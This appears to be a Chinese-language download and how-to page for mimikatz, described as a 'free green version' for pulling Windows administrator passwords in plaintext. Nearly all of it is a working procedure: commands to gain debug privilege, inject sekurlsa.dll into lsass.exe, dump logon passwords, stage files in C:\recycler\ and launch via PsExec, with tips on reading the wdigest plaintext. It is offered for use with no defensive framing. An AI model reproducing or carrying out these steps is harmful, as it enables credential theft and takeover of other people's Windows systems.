mimikatz（系统管理员密码获取） 免费绿色版

mimikatz 是一个来自法国的神器，能直接读取系统管理员密码明文，通杀xp win2003 win7 win2008，这个工具功能很强大，如果您能熟练运用它，就能体会到。

使用截图

使用方法

//提升权限privilege::debug//注入dllinject::process lsass.exe sekurlsa.dll//抓取密码@getLogonPasswords

远程抓密码的方法。

首先提取几个文件，只抓取密码的话，只需要这几个文件：

mimikatz_trunk\tools\PsExec.exe

mimikatz_trunk\Win32\mimikatz.exe

mimikatz_trunk\Win32\sekurlsa.dll

然后最简单实用的方法，使用 PsExec.exe 启动。(我的程序保存路径是C:\recycler\)

//在本机启动交互式命令提示窗口

C:\recycler\psexec \\127.0.0.1 cmd.exe

//启动一个命令行，然后执行：

mimikatz.exe C:\recycler\mimikatz.exe

//提升权限：

privilege::debug

//注入dll：

inject::process lsass.exe "C:\recycler\sekurlsa.dll"   要用绝对路径！并且路径中绝对不能有中文（可以有空格）！

//抓取密码：

@getLogonPasswords

wdigest后面就是明文密码了

//退出：

exit，不要用 ctrl + c，会导致 mimikatz.exe CPU 占用达到 100%，死循环。exit